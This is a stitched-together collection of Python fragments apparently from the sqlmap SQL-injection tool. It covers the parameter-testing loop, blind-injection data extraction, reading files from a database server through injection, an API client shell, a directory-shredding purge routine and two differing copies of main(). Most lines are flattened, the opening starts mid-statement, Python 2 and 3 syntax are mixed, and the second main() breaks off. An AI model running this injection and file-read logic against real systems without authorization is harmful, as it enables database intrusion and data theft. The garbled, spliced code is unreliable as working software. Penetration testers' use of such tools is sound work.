paramKey not in kb.testedParams: testSqlInj = True break else: paramKey = (conf.hostname, conf.path, None, None) if paramKey not in kb.testedParams: testSqlInj = True if testSqlInj and conf.hostname in kb.vulnHosts: if kb.skipVulnHost is None: message = "SQL injection vulnerability has already been detected " message += "against '%s'. Do you want to skip " % conf.hostname message += "further tests involving it? [Y/n]" kb.skipVulnHost = readInput(message, default="Y").upper() != 'N' testSqlInj = not kb.skipVulnHost if not testSqlInj: infoMsg = "skipping '%s'" % targetUrl logger.info(infoMsg) continue if conf.multipleTargets: hostCount += 1 if conf.forms and conf.method: message = "[#%d] form:\n%s %s" % (hostCount, conf.method, targetUrl) else: message = "URL %d:\n%s %s" % (hostCount, HTTPMETHOD.GET, targetUrl) if conf.cookie: message += "\nCookie: %s" % conf.cookie if conf.data is not None: message += "\n%s data: %s" % ( (conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "") if conf.forms and conf.method: if conf.method == HTTPMETHOD.GET and targetUrl.find( "?") == -1: continue message += "\ndo you want to test this form? 
[Y/n/q] " test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): if conf.method != HTTPMETHOD.GET: message = "Edit %s data [default: %s]%s: " % ( conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult( EMPTY_FORM_FIELDS_REGEX, conf.data) else "") conf.data = readInput(message, default=conf.data) conf.data = _randomFillBlankFields(conf.data) conf.data = urldecode( conf.data) if conf.data and urlencode( DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data else: if targetUrl.find("?") > -1: firstPart = targetUrl[:targetUrl.find("?")] secondPart = targetUrl[targetUrl.find("?") + 1:] message = "Edit GET data [default: %s]: " % secondPart test = readInput(message, default=secondPart) test = _randomFillBlankFields(test) conf.url = "%s?%s" % (firstPart, test) parseTargetUrl() elif test[0] in ("n", "N"): continue elif test[0] in ("q", "Q"): break else: message += "\ndo you want to test this URL? [Y/n/q]" test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): pass elif test[0] in ("n", "N"): dataToStdout(os.linesep) continue elif test[0] in ("q", "Q"): break infoMsg = "testing URL '%s'" % targetUrl logger.info(infoMsg) setupTargetEnv() if not checkConnection(suppressOutput=conf.forms ) or not checkString() or not checkRegexp(): continue checkWaf() if conf.identifyWaf: identifyWaf() if conf.nullConnection: checkNullConnection() if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \ and (kb.injection.place is None or kb.injection.parameter is None): if not any( (conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech: # NOTE: this is not needed anymore, leaving only to display # a warning message to the user in case the page is not stable checkStability() # Do a little prioritization reorder of a testable parameter list parameters = conf.parameters.keys() # Order of testing list (first to last) orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET) for place in orderList[::-1]: if place in parameters: parameters.remove(place) parameters.insert(0, place) proceed = True for place in parameters: # Test User-Agent and Referer headers only if # --level >= 3 skip = (place == PLACE.USER_AGENT and conf.level < 3) skip |= (place == PLACE.REFERER and conf.level < 3) # Test Host header only if # --level >= 5 skip |= (place == PLACE.HOST and conf.level < 5) # Test Cookie header only if --level >= 2 skip |= (place == PLACE.COOKIE and conf.level < 2) skip |= (place == PLACE.USER_AGENT and intersect( USER_AGENT_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.REFERER and intersect( REFERER_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.COOKIE and intersect( PLACE.COOKIE, conf.skip, True) not in ([], None)) skip |= (place == PLACE.HOST and intersect( PLACE.HOST, conf.skip, True) not in ([], None)) skip &= not (place == PLACE.USER_AGENT and intersect( USER_AGENT_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.REFERER and intersect( REFERER_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.HOST and intersect( HOST_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.COOKIE and intersect( (PLACE.COOKIE, ), conf.testParameter, True)) if skip: continue if kb.testOnlyCustom and place not in ( PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER): continue if place not in conf.paramDict: continue paramDict = 
conf.paramDict[place] paramType = conf.method if conf.method not in ( None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place for parameter, value in paramDict.items(): if not proceed: break kb.vainRun = False testSqlInj = True paramKey = (conf.hostname, conf.path, place, parameter) if paramKey in kb.testedParams: testSqlInj = False infoMsg = "skipping previously processed %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif parameter in conf.testParameter: pass elif parameter == conf.rParam: testSqlInj = False infoMsg = "skipping randomizing %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif parameter in conf.skip or kb.postHint and parameter.split( ' ')[-1] in conf.skip: testSqlInj = False infoMsg = "skipping %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif conf.paramExclude and ( re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)): testSqlInj = False infoMsg = "skipping %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif parameter == conf.csrfToken: testSqlInj = False infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter logger.info(infoMsg) # Ignore session-like parameters for --level < 4 elif conf.level < 4 and ( parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith( GOOGLE_ANALYTICS_COOKIE_PREFIX)): testSqlInj = False infoMsg = "ignoring %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic: check = checkDynParam(place, parameter, value) if not check: warnMsg = "%s parameter '%s' does not appear to be dynamic" % ( paramType, parameter) logger.warn(warnMsg) if conf.skipStatic: infoMsg = "skipping static %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) testSqlInj = False else: infoMsg = "%s parameter '%s' is dynamic" % ( paramType, parameter) logger.info(infoMsg) kb.testedParams.add(paramKey) if testSqlInj: try: if place == PLACE.COOKIE: pushValue(kb.mergeCookies) kb.mergeCookies = False check = heuristicCheckSqlInjection( place, parameter) if check != HEURISTIC_TEST.POSITIVE: if conf.smart or ( kb.ignoreCasted and check == HEURISTIC_TEST.CASTED): infoMsg = "skipping %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) continue infoMsg = "testing for SQL injection on %s " % paramType infoMsg += "parameter '%s'" % parameter logger.info(infoMsg) injection = checkSqlInjection( place, parameter, value) proceed = not kb.endDetection injectable = False if getattr(injection, "place", None) is not None: if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes: kb.falsePositives.append(injection) else: injectable = True kb.injections.append(injection) # In case when user wants to end detection phase (Ctrl+C) if not proceed: break msg = "%s parameter '%s' " % ( injection.place, injection.parameter) msg += "is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] " test = readInput(msg, default="N") if test[0] not in ("y", "Y"): proceed = False paramKey = (conf.hostname, conf.path, None, None) kb.testedParams.add(paramKey) if not injectable: warnMsg = "%s parameter '%s' does not seem to be " % ( paramType, parameter) warnMsg += "injectable" logger.warn(warnMsg) finally: if place == PLACE.COOKIE: kb.mergeCookies = popValue() if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None): if kb.vainRun and not conf.multipleTargets: errMsg = "no parameter(s) found for testing in the provided data " errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')" raise SqlmapNoneDataException(errMsg) else: errMsg = "all tested parameters appear to be not injectable." if conf.level < 5 or conf.risk < 3: errMsg += " Try to increase '--level'/'--risk' values " errMsg += "to perform more tests." if isinstance(conf.tech, list) and len(conf.tech) < 5: errMsg += " Rerun without providing the option '--technique'." if not conf.textOnly and kb.originalPage: percent = ( 100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage)) if kb.dynamicMarkings: errMsg += " You can give it a go with the switch '--text-only' " errMsg += "if the target page has a low percentage " errMsg += "of textual content (~%.2f%% of " % percent errMsg += "page content is text)." elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone: errMsg += " Please retry with the switch '--text-only' " errMsg += "(along with --technique=BU) as this case " errMsg += "looks like a perfect candidate " errMsg += "(low textual content along with inability " errMsg += "of comparison engine to detect at least " errMsg += "one dynamic parameter)." if kb.heuristicTest == HEURISTIC_TEST.POSITIVE: errMsg += " As heuristic test turned out positive you are " errMsg += "strongly advised to continue on with the tests. " errMsg += "Please, consider usage of tampering scripts as " errMsg += "your target might filter the queries." if not conf.string and not conf.notString and not conf.regexp: errMsg += " Also, you can try to rerun by providing " errMsg += "either a valid value for option '--string' " errMsg += "(or '--regexp')." elif conf.string: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--string' as perhaps the string you " errMsg += "have chosen does not match " errMsg += "exclusively True responses." elif conf.regexp: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--regexp' as perhaps the regular " errMsg += "expression that you have chosen " errMsg += "does not match exclusively True responses." if not conf.tamper: errMsg += " If you suspect that there is some kind of protection mechanism " errMsg += "involved (e.g. WAF) maybe you could retry " errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')" raise SqlmapNotVulnerableException(errMsg.rstrip('.')) else: # Flush the flag kb.testMode = False _saveToResultsFile() _saveToHashDB() _showInjections() _selectInjection() if kb.injection.place is not None and kb.injection.parameter is not None: if conf.multipleTargets: message = "do you want to exploit this SQL injection? [Y/n] " exploit = readInput(message, default="Y") condition = not exploit or exploit[0] in ("y", "Y") else: condition = True if condition: action() except KeyboardInterrupt: if conf.multipleTargets: warnMsg = "user aborted in multiple target mode" logger.warn(warnMsg) message = "do you want to skip to the next target in list? 
[Y/n/q]" test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): pass elif test[0] in ("n", "N"): return False elif test[0] in ("q", "Q"): raise SqlmapUserQuitException else: raise except SqlmapUserQuitException: raise except SqlmapSilentQuitException: raise except SqlmapBaseException, ex: errMsg = getSafeExString(ex) if conf.multipleTargets: _saveToResultsFile() errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL") logger.error(errMsg.lstrip(", ")) else: logger.critical(errMsg) return False finally:
def thread_register(args):
    if not 0 < args.thread < 501:
        msg = 'invalid thread count for [-t], valid range: 1 - 500.'
        sys.exit(logger.error(msg))
    conf['thread_num'] = args.thread
    logger.sysinfo("thread count set to: %s" % str(conf['thread_num']))

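# Hypothetical wiring for the validator above (the '-t' flag and the 'thread'
# attribute name come from the function itself; everything else is assumed).
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-t", dest="thread", type=int, default=10,
                    help="number of worker threads (1 - 500)")
thread_register(parser.parse_args())
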
def readFile(self, remoteFile): localFilePaths = [] self.checkDbmsOs() for remoteFile in remoteFile.split(','): fileContent = None kb.fileReadMode = True if conf.direct or isStackingAvailable(): if isStackingAvailable(): debugMsg = "going to read the file with stacked query SQL " debugMsg += "injection technique" logger.debug(debugMsg) fileContent = self.stackedReadFile(remoteFile) elif Backend.isDbms(DBMS.MYSQL): debugMsg = "going to read the file with a non-stacked query " debugMsg += "SQL injection technique" logger.debug(debugMsg) fileContent = self.nonStackedReadFile(remoteFile) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to read files from the underlying file " errMsg += "system of the back-end %s server" % Backend.getDbms( ) logger.error(errMsg) fileContent = None kb.fileReadMode = False if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) elif isListLike(fileContent): newFileContent = "" for chunk in fileContent: if isListLike(chunk): if len(chunk) > 0: chunk = chunk[0] else: chunk = "" if chunk: newFileContent += chunk fileContent = newFileContent if fileContent is not None: fileContent = decodeDbmsHexValue(fileContent, True) if fileContent.strip(): localFilePath = dataToOutFile(remoteFile, fileContent) if not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) sameFile = self.askCheckReadFile(localFilePath, remoteFile) if sameFile is True: localFilePath += " (same file)" elif sameFile is False: localFilePath += " (size differs from remote file)" localFilePaths.append(localFilePath) elif not kb.bruteMode: errMsg = "no data retrieved" logger.error(errMsg) return localFilePaths
def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Retrieve the output of a SQL query characted by character taking advantage of an blind SQL injection vulnerability on the affected parameter through a bisection algorithm. """ initTechnique(getTechnique()) query = agent.prefixQuery(getTechniqueData().vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) count = None startLimit = 0 stopLimit = None outputs = BigArray() if not unpack: return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): expressionFieldsList = [expressionFields] if len(expressionFieldsList) > 1: infoMsg = "the SQL query provided has more than one field. " infoMsg += "sqlmap will now unpack it into distinct queries " infoMsg += "to be able to retrieve the output even if we " infoMsg += "are going blind" logger.info(infoMsg) # If we have been here from SQL query/shell we have to check if # the SQL query might return multiple entries and in such case # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: test = True if not stopLimit or stopLimit <= 1: if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): test = False if test: # Count the number of SQL query entries output countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] if not stopLimit: count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) if isNumPosStrValue(count): count = int(count) if batch or count == 1: stopLimit = count else: message = "the SQL query provided can return " message += "%d entries. How many " % count message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" choice = readInput(message, default='A').upper() if choice == 'A': stopLimit = count elif choice == 'Q': raise SqlmapUserQuitException elif isDigit(choice) and int(choice) > 0 and int(choice) <= count: stopLimit = int(choice) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) elif choice in ('#', 'S'): message = "how many? 
" stopLimit = readInput(message, default="10") if not isDigit(stopLimit): errMsg = "invalid choice" logger.error(errMsg) return None else: stopLimit = int(stopLimit) else: errMsg = "invalid choice" logger.error(errMsg) return None elif count and not isDigit(count): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) return None elif (not stopLimit or stopLimit == 0): return None try: try: for num in xrange(startLimit or 0, stopLimit or 0): output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) outputs.append(output) except OverflowError: errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) errMsg += "with switch '--fresh-queries'" raise SqlmapDataException(errMsg) except KeyboardInterrupt: print() warnMsg = "user aborted during dumping phase" logger.warn(warnMsg) return outputs elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper(): expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None
taskid = None
logger.info("Type 'help' or '?' for list of available commands")

while True:
    try:
        command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip()
        command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command)
    except (EOFError, KeyboardInterrupt):
        print
        break

    if command in ("data", "log", "status", "stop", "kill"):
        if not taskid:
            logger.error("No task ID in use")
            continue

        raw = _client("%s/scan/%s/%s" % (addr, taskid, command))
        res = dejsonize(raw)

        if not res["success"]:
            logger.error("Failed to execute command %s" % command)

        dataToStdout("%s\n" % raw)

    elif command.startswith("option"):
        if not taskid:
            logger.error("No task ID in use")
            continue

        try:
            command, option = command.split(" ")
        except ValueError:
            raw = _client("%s/option/%s/list" % (addr, taskid))

def purge(directory):
    """
    Safely removes content from a given directory
    """

    if not os.path.isdir(directory):
        warnMsg = "skipping purging of directory '%s' as it does not exist" % directory
        logger.warn(warnMsg)
        return

    infoMsg = "purging content of directory '%s'..." % directory
    logger.info(infoMsg)

    filepaths = []
    dirpaths = []

    for rootpath, directories, filenames in os.walk(directory):
        dirpaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in directories)
        filepaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in filenames)

    logger.debug("changing file attributes")

    for filepath in filepaths:
        try:
            os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE)
        except:
            pass

    logger.debug("writing random data to files")

    for filepath in filepaths:
        try:
            filesize = os.path.getsize(filepath)
            with openFile(filepath, "w+b") as f:
                f.write("".join(_unichr(random.randint(0, 255)) for _ in xrange(filesize)))
        except:
            pass

    logger.debug("truncating files")

    for filepath in filepaths:
        try:
            with open(filepath, 'w') as f:
                pass
        except:
            pass

    logger.debug("renaming filenames to random values")

    for filepath in filepaths:
        try:
            os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.ascii_letters, random.randint(4, 8)))))
        except:
            pass

    dirpaths.sort(key=functools.cmp_to_key(lambda x, y: y.count(os.path.sep) - x.count(os.path.sep)))

    logger.debug("renaming directory names to random values")

    for dirpath in dirpaths:
        try:
            os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.ascii_letters, random.randint(4, 8)))))
        except:
            pass

    logger.debug("deleting the whole directory tree")

    try:
        shutil.rmtree(directory)
    except OSError as ex:
        logger.error("problem occurred while removing directory '%s' ('%s')" % (getUnicode(directory), getSafeExString(ex)))

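# Hedged usage sketch for purge() above: shredding and removing a scratch
# directory. The directory and file names here are only examples.
import os
import tempfile

scratch = tempfile.mkdtemp(prefix="purge-demo-")
with open(os.path.join(scratch, "secret.txt"), "w") as f:
    f.write("to be shredded")

purge(scratch)  # overwrites, renames and finally removes the whole tree
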
def main(): """ Main function of sqlmap when running from command line. """ try: dirtyPatches() resolveCrossReferences() checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) if checkPipedInput(): conf.batch = True if conf.get("api"): # heavy imports from lib.utils.api import StdDbOut from lib.utils.api import setRestAPILog # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) init() if not conf.updateAll: # Postponed imports (faster start) if conf.smokeTest: from lib.core.testing import smokeTest os._exitcode = 1 - (smokeTest() or 0) elif conf.vulnTest: from lib.core.testing import vulnTest os._exitcode = 1 - (vulnTest() or 0) elif conf.liveTest: from lib.core.testing import liveTest os._exitcode = 1 - (liveTest() or 0) else: from lib.controller.controller import start if conf.profile and six.PY2: from lib.core.profiling import profile globals()["start"] = start profile() else: try: start() except Exception as ex: os._exitcode = 1 if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: if not conf.batch: errMsg = "user quit" logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) raise SystemExit except KeyboardInterrupt: print() except EOFError: print() errMsg = "exit" logger.error(errMsg) except SystemExit: pass except: print() errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() valid = checkIntegrity() if valid is False: errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("tamper/", "waf/")): logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("ImportError", "Can't find file for module")): errMsg = "invalid runtime environment ('%s')" % excMsg.split( "Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")): errMsg = "memory exhaustion detected" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")): errMsg = "no space left on output device" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("The paging file is too small", )): errMsg = "no space left for paging file" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'")): errMsg = "corrupted installation detected ('%s'). 
" % excMsg.strip( ).split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.critical(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.critical(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" logger.critical(errMsg) raise SystemExit elif "Invalid IPv6 URL" in excMsg: errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp")): errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir( ) errMsg += "Please make sure that your disk is not full and " errMsg += "that you have sufficient write permissions to " errMsg += "create temporary files and/or directories" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" logger.critical(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7. Please update accordingly " errMsg += "(Reference: https://bugs.python.org/issue8104)" logger.critical(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. " errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.critical(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all( _ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" logger.critical(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % ( " ('%s')" % match.group(1) if match else "") errMsg += ". 
Please delete .pyc files on your system to fix the problem" logger.critical(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe", )): raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) try: file_ = os.path.relpath(file_, os.path.dirname(__file__)) except ValueError: pass file_ = file_.replace("\\", '/') if "../" in file_: file_ = re.sub(r"(\.\./)+", '/', file_) else: file_ = file_.lstrip('/') file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if conf.get("api") or not valid: logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL)) createGithubIssue(errMsg, excMsg) finally: kb.threadContinue = False _ = getDaysFromLastUpdate() if _ > LAST_UPDATE_NAGGING_DAYS: warnMsg = "you haven't updated sqlmap for more than %d days!!!" % _ logger.warn(warnMsg) if conf.get("showTime"): dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob( os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filterNone( filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any( filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))): # ignore junk files try: shutil.rmtree(kb.tempDir, ignore_errors=True) except OSError: pass if conf.get("hashDB"): conf.hashDB.flush(True) if conf.get("harFile"): try: with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.get("api"): conf.databaseCursor.disconnect() if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization _ = time.time() while threading.activeCount() > 1 and ( time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() conf.disableBanner = True main()
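# --- Illustrative sketch (not part of sqlmap) ---------------------------------
# The main() above triages unhandled exceptions by matching known substrings in
# the formatted traceback before deciding how to report them. A minimal
# standalone version of that pattern (the signature table below is only an
# example subset, not the full set used above):

import traceback

KNOWN_FAILURES = {
    "MemoryError": "memory exhaustion detected",
    "No space left": "no space left on output device",
    "Read-only file system": "output device is mounted as read-only",
}

def triage_unhandled(func):
    try:
        func()
    except Exception:
        exc_msg = traceback.format_exc()
        for signature, friendly in KNOWN_FAILURES.items():
            if signature in exc_msg:
                print("[CRITICAL] %s" % friendly)
                return
        # unknown failure: show the traceback instead of a friendly message
        print(exc_msg)

if __name__ == "__main__":
    def _boom():
        raise MemoryError("simulated")
    triage_unhandled(_boom)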
def main(): """ Main function of sqlmap when running from command line. """ try: dirtyPatches() resolveCrossReferences() checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration args = cmdLineParser() cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args) initOptions(cmdLineOptions) if checkPipedInput(): conf.batch = True if conf.get("api"): # heavy imports from lib.utils.api import StdDbOut from lib.utils.api import setRestAPILog # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) init() if not conf.updateAll: # Postponed imports (faster start) if conf.smokeTest: from lib.core.testing import smokeTest os._exitcode = 1 - (smokeTest() or 0) elif conf.vulnTest: from lib.core.testing import vulnTest os._exitcode = 1 - (vulnTest() or 0) else: from lib.controller.controller import start if conf.profile: from lib.core.profiling import profile globals()["start"] = start profile() else: try: if conf.crawlDepth and conf.bulkFile: targets = getFileItems(conf.bulkFile) for i in xrange(len(targets)): target = None try: kb.targets = OrderedSet() target = targets[i] if not re.search(r"(?i)\Ahttp[s]*://", target): target = "http://%s" % target infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (target, i + 1, len(targets)) logger.info(infoMsg) crawl(target) except Exception as ex: if target and not isinstance(ex, SqlmapUserQuitException): errMsg = "problem occurred while crawling '%s' ('%s')" % (target, getSafeExString(ex)) logger.error(errMsg) else: raise else: if kb.targets: start() else: start() except Exception as ex: os._exitcode = 1 if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. 
